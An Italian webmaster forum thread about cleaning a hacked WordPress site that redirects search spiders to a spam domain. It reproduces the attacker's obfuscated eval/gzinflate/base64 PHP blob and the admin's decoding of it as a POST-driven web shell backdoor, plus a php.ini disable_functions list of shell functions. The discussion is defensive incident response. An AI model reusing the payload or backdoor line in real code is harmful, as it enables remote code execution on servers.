• User

    Redirect 301 per spider ma non per utenti

    Salve a tutti,
    un sito che seguo, vetmobile.it, è stato hakerato qualche mese fa e da allora è sorto un problema che dura ancora oggi e che sta penalizzando il sito: è stato creato un redirect 301 che funziona solamente per gli spider, infatti se si inserisce l'url nella barra degli indirizzi gli utenti visualizzano correttamente la pagina.

    Per prima cosa ho controllato il Webmaster Tool e non ho trovato nessun tipo di azione manuale antispam, per cui ho proseguito nella ricerca effettuando i seguenti controlli:

    1. Ho controllato che il file .htaccess non contenesse codici strani, di seguito il contenuto del file:

    BEGIN WordPress

    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index.php$ -
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php
    </IfModule>

    END WordPress

    1. Ho visualizzato la pagina come la vede Google, (non potendo inserire l'immagine ve lo riassumo):

    HTTP/1.1 301 Moved Permanently
    Date: Thu, 08 Jan 2015 11:25:18 GMT
    Server: Apache/2.4.10 (Unix) mod_fcgid/2.3.9
    X-Powered-By: PHP/5.3.29
    Location: corporatehospitality.it/saccherpas/longchamp/?longchamp=longchamp+pas+cher
    Content-Lenght: 0
    Keep-Alive: timeuot=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html

    1. Codice del file header.php del template wordpress:

    <?php

    /**

    • The Header for our theme.

    • Displays all of the <head> section and everything up till <div id="main">

    • @package vantage

    • @since vantage 1.0

    • @license GPL 2.0

    */

    ?><!DOCTYPE html>

    <html <?php language_attributes(); ?>>

    <head>

    <script>

    (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i=i||function(){

    (i.q=i.q||[]).push(arguments)},i.l=1*new Date();a=s.createElement(o),

    m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)

    })(window,document,'script','//google-analytics. com/ analytics.js','ga');

    ga('create', 'UA-54302067-28', 'auto');

    ga('send', 'pageview');

    </script>

    <meta name="msvalidate.01" content="03F82B0A68C6B7DF27C3C972D3234F61" />

    <meta charset="<?php bloginfo( 'charset' ); ?>" />
    
    
    <meta http-equiv="X-UA-Compatible" content="IE=10" />
    
    
    <title><?php wp_title( '|', true, 'right' ); ?></title>
    
    
    <link rel="profile" href="gmpg.org/xfn/11" />
    
    
    <link rel="pingback" href="<?php bloginfo( 'pingback_url' ); ?>" />
    
    
    <?php wp_head(); ?>
    

    </head>

    <body <?php body_class(); ?>>

    <?php do_action('vantage_before_page_wrapper') ?>

    <div id="page-wrapper">

    <?php do_action( 'vantage_before_masthead' ); ?>
    
    
    
    
    
    
    <?php get_template_part( 'parts/masthead', apply_filters( 'vantage_masthead_type', siteorigin_setting( 'layout_masthead' ) ) ); ?>
    
    
    
    
    
    
    <?php do_action( 'vantage_after_masthead' ); ?>
    
    
    
    
    
    
    <?php vantage_render_slider() ?>
    
    
    
    
    
    
    <?php do_action( 'vantage_before_main_container' ); ?>
    
    
    
    
    
    
    <div id="main" class="site-main">
    
    
        <div class="full-container">
    
    
            <?php do_action( 'vantage_main_top' ); ?>
    
    1. Il contenuto del file index.php del template:

    <?php
    /**

    • The main template file.

    • This is the most generic template file in a WordPress theme

    • and one of the two required files for a theme (the other being style.css).

    • It is used to display a page when nothing more specific matches a query.

    • E.g., it puts together the home page when no home.php file exists.

    • @package vantage

    • @since vantage 1.0

    • @license GPL 2.0
      */

    get_header(); ?>

    <div id="primary" class="content-area">

    <div id="content" class="site-content" role="main">
    
    
        <?php get_template_part( 'loops/loop', siteorigin_setting('blog_archive_layout') ) ?>
    
    
    </div><!-- #content .site-content -->
    

    </div><!-- #primary .content-area -->

    <?php get_sidebar(); ?>

    <?php get_footer(); ?>

    Suggerimenti?


  • Admin

    Fai una grep su tutta la cartella del tema e dei plugin cercando "corporatehospitality" oppure cercando "eval" o "base64".


  • User

    Ciao Juanin,
    grazie per il consiglio.

    Ho trovato il file jquery-ui-dialog.php cercando "eval"; è un file che riporta una data diversa da tutti gli altri js della cartella, per cui è l'indiziato numero uno.

    Ora basta eliminarlo o c'è altro da fare?

    Per il momento l'ho eliminato e ho fatto immediatamente il test visualizza come google, ma non sembra cambiato nulla. Devo aspettare?

    Grazie veramente.


  • Admin

    Devi vedere cosa c'è dentro.

    Solitamente devi cercare un riferimento simile a quello che appare sopra. Prova varie combinazioni.

    Sicuramente una delle prime cose che puoi fare è disabilitare dal php.ini le funzioni "pericolose".

    Esempio:

    [PHP]disable_functions = pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,dl,shell_exec,escapeshellarg,escapeshellcmd,shell_exec,system,passthru,proc_open,proc_nice,proc_terminate,proc_get_status,proc_close,leak,apache_child_terminate,posix_kill,posix_mkfifo,posix_setpgid,posix_setsid,posix_setuid[/PHP]


  • User

    Oltre a quelle indicate da te, come posso sapere se ci sono altre funzioni pericolose?

    Di seguito il codice all'interno del file:

    <?php
    eval(gzinflate(base64_decode('FZlFEsTWskTn3sizQwNRi+KBo8XMPPkhZmat/rc3oEFVVp7Mq7//95+/53r+44/iTPo/q7cZyz7Ziz/TZCvwz//lRTblxZ//4uOSZzdH4jz3BB4z7i1q8IYvHA8JYAspMhjjqhF9LGxdksO5D4MnYYIgXiDEYIKf6UXdz4YS6WKvzller0MUzmViaW8OqGKCJI3l3nfNMa2gRMUMIqcgvYkChSduNOruTaA5Gl6kcSxMBMyTa11CWElsGn53C4lpJNnnbg6r+nHmcT71bQGYT/XLumz7idmxRWb4Y5RhOFTwdcNzZkcSabur73WDlaZdz7svoOYwWanxyr31tOgl5DrJvb/EnJyZ5L+rhNDqhcNsPxcfRRyn+yuh9nmEze4hRr4RymPjsY8QqcNYnweY1YqM6GJoCyhubJQrQI7JFL1wfKVoPu++2BfxRYp4LLKT1Jngnacp0dmmie2vsU9GOuglglmC84llhEbvyx59bxQlvvQLf9SVIuU2vo1FskQ+F9w3zjC1tawjGMk7om50dVUSj6XEqK6D3VwcZjRwTQCywQy0QIXc9P4mgDScSRjjvZ1/QzU81mAH84dQYt1Ze7aroeLu+OmalxbXB5rBjcIAGq3PPZTj85ADjhBOeSN6gSe6LbCHwIOKvlJy2yBt6zBicsTB7kDQ1oq/H/5SNTYULV1xCs1Cuyf+wPwxaN18fkfAv2rmSU6hPeyu9lOYyu9+7c28PTXcpOJmixChKypZ6wAenYq6br0uWoD2oqPcpEoZM68HmFSzNqQhavqvsgavnkbuiJUJSRgvGp6vyEK7cpY28cEnrrwhAjpITqhlWjXAmxVDGQBauYQZepBG9PTGq4c7+TRI2aE3th7mTpXaCBFVB+V9jx2CW8LdKZRk0kIdV+4koyLCwuspS9JgTCUAkuyEk9OuY98oZsoT6fJO0ELfCe4nfJJeVdvQjtFjbGKP5Zsi1IjBDEZmlfY8qIff1uld01aMFWf0ob9WD1IfUg022ftWB/qwkjqe1nIdhL/hBOGG+yZ59iHGgz6zTBaYrlDp+ITo6sdziVg/6Xv6jMo3emDaW3Pcoo+6GFUvAiwph40EGrr12La0kIEFVlVRZVwK0edKAL3UzRQc52wQe4vc8u9YMaUk6gM/aS92JdFQngGLMcHK6uwzscFL1FY2wFD6XKhLpTmNIBTuDMox96dY0n2TO8BqMs9N1W7r1WezsrHG5KdCX8tJoY/1E7YVUgqjy71XSh/IT5OnXzDgsJKmkZdqljelTSUuW/eQR+1eAIi4ioMnPxN9FT9AIxJFVWyiwHnA4VIhlI7pfL637WHXd1NcVIMQZzTqvkjwebLrdUsfwfS6JDouadvefOjnK+GmNStznmyTnviAHtCnCRmnZ0iekX9wLvP0bEXDTNynlTGMPPSczQLf3532OyWHUepnkONOnxxll5cbnkFzrTQHpbUQUf4pCWUXhL+zJqt7OC4tXdq4ETQidPhFKOhPhDu9k46CfbS+h8SVh9OKcF3K/Ho+Sc/BgVjnBbwd2d6d/x6xLMzXfvIaxOtmvCFz++JvaMKt49GzuKMYF4n2EFsxtKDJC6TVh6TpKxjn4t2YCmYqS5nv/afkiGeBO6+HXslYIS2rHBWTS3idCsxCLg+FwJfXEDfyd0uQfAz7Zt94cbq+5WDDIMGRAmgKePdTtueBntGq3IciySAz5ItAO+Qjc4vXdCoasIWZIv1VX5/HOzOtCXVId3nHOx4V43p3FG2tiDfUFNKB6o6Xaq47zhACMElqLXyEw41NGPX9M8x4PIEGlVG0Sva65WjTGBxaDHGUoIw0W7tYPZyO41HGA+E/WnwnZrTrVP7ZIrS+y8ntuBT10N4UJpe/64TGzW+AeVFcIR4MbVAQ/ZhtRAWQiwCXCTuwzlVahTIBEB4fzHlQXvsM7Voi+5d/plNfjLhT7N7JboHt4uuk+SwPddllXLLmIMqyrrtsGP0rXC+GqjsyWemJNIxBrnvhBbi8KkurcQQb4ekjxvTDP1b4nAqcuSdttpzOeUdXrMKe2LYyPyqR0gLEg9NMS3U5QKMD6VWzuoyZF6Lu67IZLIr3wtCIqmVinzGe2xN+bwD7rF41MHBhiaekebZbxVELI0mKlbzFqS1bBkxDO29rdUJm1GvDr2UrkUTUGNPYpiclBSLiPEpLq7gikQEcYLCBx9GkQFS/4nZSvOWVgBpWLrvrTdUroim1PTNis59Kidl/wIp+VWkTtCzU19ki2nH5scf3XJxKnPeR0k+fCHOYXgFIhmSA+0sR4eF9NYa6NZmpJveHOKshTx3dYz+NQUCbmvAUtmLPxCK27tSc7DBDEJMA9BaFYlPAEU303LCd5gr7k2Lqp5vILzqGmwSk3IWapS/l4iL7Y/yQwV2B1dElgZKlOZv47EFjPOB83+2CsJ/ysuDnexmwrN/tPiXGHOMaVYyAxHtPw0uH025PpFlXTy11/8hK6m9hndPs6G4IdRGYP5L+S4czIs0/qIjZpjBj9Bk9hznl4T3KyxRMZqEMNvaOC3siXZCAZZ/wT8cFad9IdZtiyi4RvXb0YTFd5o/fha/dTdR8twe8GZjB+QQviOYDL5ghw4bDNPOtSVpt549IxrdEfujiDFukDF45NIXXlZOMdYoZWky2bbWrgSQ9RjaWtkz8iAkz3Gfj4kqvtBZJ4ki+iDIp9ccjQUd/E6wDxYuIh1BIBFJ9eqwbD3WdDIZoGFcsiry3AfE04Oj2BS2hzj4TfH4cSLV72uHYos7mLOZWY3/cCOFNlcN1TqD4IAspuc1NVOd+U3wXVqgqW0Ws7/G4tKnJ6Z6ANnJXgNse7tDDL0zOfujBYHvBy2GLjmofBTEeU2tAirFLKgdxEsv7IYmfwWDYRPB+3C7h1anzpglBomijlW/vlZQkeVVQp+cmUOksJHPH0GgqrAIi9QmZ38+SG1bq34JAoSgVXVBFPboKUkDb2xJ58C7gq+3visex9rmZDTWK3djhhmEsWdicZtpNc/waG/fCbnQdwD8HFpOJYwgkxjKHz7Gd7okQy0s17yqce/kX67uoknXq5Anv9Daq+GXuPi6y1ogWstMj6IeVIOHCwT2AkIb77ByoQC8Ma6KNV2+u+EdDTN1IhWwdXDiBoTBD9LRtKltIPjNEFU6QOeYLD0rtN6zFyPvF5P5uc4hY2jYje8ZgU9H0JRm4OCu21gFHXxv8btw3bm+COglx/uLeaY0hlYAC19NlbCJ5s82OSeExdCPq3J5rW7KmgAhYaZqlY1mnBfEXV/XD5dovoWdS30TKLs7P7K6dbkdkpixarlqSdGovBJYmTfTXl4yaYiif+YfO7ZEAKSynLRrbLiaEpf74Lh5FjhPzu8E3LtlMlr/PCd+aL9alMfccouxIexiHaX0D1s/FWYMztHv6AiQMW7fyzEUVnzdgW4yqDvygTsATfIVIVBCOiCmHq3+DOR2gX5PVXlKaTln15z1e/w1sd3K6OjiG0l4/pc4b+oYit4bjZD2aW+APaJ6XAqkq55ODUotOuiaYeQAXsZttm0xpWA243xuH46prvifuYK9Kf1Bhyo6JnJksDdF2uVpA2d479wEM2b5oULjKeNy4VXzf9nbxTxsSZHj74rklKzrJnGaSIFQEtRooarpYAzt+tjPZ5R5n73O/3c31uCoy0v6gpsGSrhkUgpG+tLAXkZ1ETvhEtYVVfRRXRweUZ4TxJC6UkqvYioUMRglQFFxTbXzop21FJTwJNWcWrKVTVmEDF0XTJ4x8fSp0u8+B7iS+ZJLSR4kvFtsn/oVolIl8iD8gUkXQciaoB3pFWpBabwVNGbwcp//dtFgBDxNVebLgW622UeTWBtAFzinJFFddeziCmgScaKpv7pb4I6rfj3PKuOWV5hWqScYb8mb4aLj5AA/qQEoJnmbbeuUxAlP3mF2EwwL7S5I8p2lhOiZLCbRmHwxHHB72643CCbZ5eUf7lAMawEkZ2HDj88tnb8SIgOJR6NZ4Y6AzJ3vq41NiecrQs3wLCqcnSKd63vImXaKyVwWsBJqee6XZBvk1COwXrAKd7Jh4vbOYxC6R0IJIEKCt8wtqip2sn4odtllGNlC3gSHnCcqHAiPEumXm45Ine/YfMpA+akdBZhC68IOY7s3KblFdVCogHbze7AYlsZfTeLQKM4cqeM0qG4xmhT4M84sqyX0ZoOC5h/ZBtdqZ5fgFSTRN1HKMGwzS+0ha+19xCii02+hLOp4rWXmUe5eomA1CV3IJuPhmR0w+DgZVb6IEC5oGQOJ3tYg+8upwPossiok5/iYBV2SNKL/DRVIbDiZiSE7jsG3Gd5M6fuTt/BjbhejqFzf7xu3tFwlt7saGSQEdoU5nkUaEHK7dGZtEjnlX/krgr/RWxXFxcXAK66DR8AoQI+YIcH03Z43ihHr16sNJU4BbFrhuq/812M2BflXPTfEnmd7wV7uIpxQfp42Ptw1vrIal0aN/9e+aZWu0qOYVE+4ojJf8Jf21z3fiuAWOqRzovhQWjVYpa3ABMbJz8p1cpRHNaeQcrPoZ74xk4B+qdyBWX70GJ9+ZpuKMizzL9GBPIjEmfTYw4T8iXRhMo4gjb74fKtkj6hh/o3+/W63Zo/xNIvAXw/eUfhxZc6LriR6gqx0wdo2I6skIkUEKE3ix7XUyo9rt+coX1g8OED+jLajw7hEwPlPe26kFc6SsSXBOf05FLiFmx03ZuFpOrGT2N2s0pnohLofHzVfYZDoieG8Si4iYbkC6FyLuhSv7QNby84O3S4evjQPZTonXmYR9FQk3g7UwOG4HAmj4qE+PxbUbtelEKzq+fnyy7dhZ/NorUj41uhgPWdEtToRAdpmG8ZpbZMfGSIXsPMGGKdkAbkk4G2U7bQk/0zSrYF22ZgLvL/75ptuNbG+mfwD2uDXqqM4rarx713fc+Un/FqXARVU1ntdHNJdtsYmHXdpXpGAmsriZ/mT39iasn04aWg/i2SErMxNVgWFMT/FhQx3+1mjIL20iWoViFUqZFdgKqy7EhNVlzHbe4glILdA68DGX48MGHIZw21POgZ2hoYBH6FJQR4BOHBkUYoZrtE6Uzklry+2FLrCA3rMvp4nSBK4YLgRYJGrIussJOqlcrwuxnj9ZXJ92iHJCBkxkfMRLS8u8X8qh43y5BLnWWT8TGi+6E3AFjekU6XaNX9aRCvFS/WP8KtiADdBXkhqiysN0mBAs7zwdARMQrxvc+7bPReJVUf8cqkumy8+rwGnZG9U1zAcI0Idy/lfzZT/NrM+3T2VGB045oqLfRhZGjMmD/X4GUio19fvBmFdn6tLNgSmawhgEMYDnHCdhynOu3HLQQDcsZRQLjoJJR446pHGIX/RJ6/2ALFH7PHnFXjsu6rNRBuChdjx35S6MdCP7hZ9r09gioInTVOHf+nL5Fj5vxkyQowbCsFr2C39nvlhPI0h2DgJ3cI6fiLkjbmJDcXkQW9XFaRb0yUZw4Ab7a2nwFPgENxzRH5ICn4aKHTziF02eWwTJfsV6PxmR8SfMJRM8FF4CWFGNpYJ7OUJN8rZVgay4T0cihaYeaao23GKzEyxVBjADGccH+lSIJIGyldgCUMYxgqHdOc1k1M9b3b8j7kdtsZOPNdCQ+ev7kUGxpUYSDV+cb8Xld9HL2a6UGCu2jVywCIh/xBqqB60/ALz9zHg/7NVrWr/MCutZHM0hsjr4o8c3ppWBASU70rIo84HSTvdLsNycRg8RAxOJGTSzGXW0OWUqwUfbX9N7L55xV8JEn4eOtI02xx1MJb/EuGpIFgOzlltojQ1SYQeqMu2iD/gWud9R9Co0vUDw65IuAXc+7rR+moNFirLquoNL/cNch8FncRCzwiJZ2oDbw/WwgmiEm3MU9fKCicJAXKVzrMnSvAqARCCeXq6VCYXoLN5O6pJvQ96xD99yEouY7Iyx0SrpqK5wlDdyUp7vP0+j8i1LRWvsiQKTHCnQUCQDIV8NQOaiXA7SRFnlnVS/xusNU6JBdE13zBz/irdal59bNaKcG+hBLOs+waLXkcoclMlCO8vKX6+m3CAraGpinFvZ6847ORaGoNujQMJB4/Gc5B7q+2GTD0JuTWKuKVtxaU4c5lqQaOgfv5AVPav7Wp2h6hUOdx7YHilxbDz5+/CXfSKuynuLkdnE/AzSKJUufZjaYYEBl1HNALOwiGZWBFcQ9iXyJYVpRvnuI9KiUg/lwSW23LCHokxNwNXDMFBNM+/MWlPcYVGVB/mlH5O8OsSoiMn8XE6ZMypnBRnK9G1OXu0mx3xDzoVXNfPTIIw9rBQrECotP9J12xvev3ydDxPqDEb50a1v1WdJ3RVIqwCstGRWBkaF+3pkAvccpiwqsj5uDs7sedWcWUHvMNRH+P7OKPrZRGGnxqBpHYiioEDDvwMgYjGUz6jIWFlYpMLgX8wkSGyPvP0qsW754cIhHroG9+2Kr9RFW+pZgtPgiZL+TnJvFuwztQC4S0Oz+x/2KylB+8F5aETEMBe66AF/ECTp7LuuRVfaUFX4Fj1CHlLv3OxoOtnaHHX7ecs80/zCK6Fsk7bw2C+XkeFq0Fawpjf1cGFx9XKNzlK3t1Sv0LwbPKYl4Aig/8iSh4tRiPAi/opSax2KONS6KhVn11/BuJFvT8I/Fdb5VriSpruCNgqW4U8OTJmp5FFXUrvBR4ibqeuiHgCB57Wr8v6F3/RjxjgVlg+skzFXcP5X8eZJxB3/RxPqdRjRZCueg4qwVpIhL1Jz3uknjAiY2vSh7xejf2AI04Ye7+hf1MaFn5Ok37Ne92yqVC54JehH4Bi7UR8xv78ksoEkvZHa8lFtd5sH2vNQiQ9Mby+/3LnAYlH4IjNHclxxmJ9e3z3P942AbYFzbpOKcLc0YUGEngHue71sJ6pXlXXjzvgrG80eKwhiiqx+Rqz9+K9r0WcPTqHId91y4Y93hVNJtJApS9O32GNA0JYx+ayFMLZVUeRsTMiIalvPFNK4IME/oulUbTxhJ1MuRX78dRCbRuHILBtOYYd6Uhu0jSJQe9v7XNBoMGTQkD1oLlEXp2NbMDBSlIrhRzHEsJa/eib3DCOoQIPbZJr9VlctXSBxHatpEMMnIhVuA25n3FCcJQgSYoiCFJWR4D+/xk6QAMTrv//9119//fXvP/7+33/+/n8=')));
    ?>


  • Admin

    Sì. Il codice che produce una volta valutato è questo

    [PHP]?><? @eval($_POST['huanyingbaba']) ?><?[/PHP]

    Devi rimuoverlo perché in teoria permette remote execution.

    Una volta pulito il tutto però devi capire da dove sono riusciti ad infilartelo altrimenti tra qualche giorno lo ritroverai. Sicuramente potrebbero anche aver inserito la shello shock con questa procedura quindi controlla attentamente tutti i file sul tuo server.


  • User

    Ricapitolando:

    1. rimuovo il file jquery-ui-dialog.php
    2. faccio un controllo su tutto il contenuto del server per capire da dove sono riusciti ad inserirlo. Per questa operazione c'è un plugin [h=2]Shellshock Check. Lo hai già usato? Consigli comunque una ricerca manuale?
      Grazie ancora.

  • Admin

    Non devi rimuovere il file, ma solo la porzione di codice malevola.

    Cerca anche se ce ne sono altre e cerca anche il nome della variabile nella post. Per il resto io lavoro direttamente da shell quindi non so consigliarti dei tool.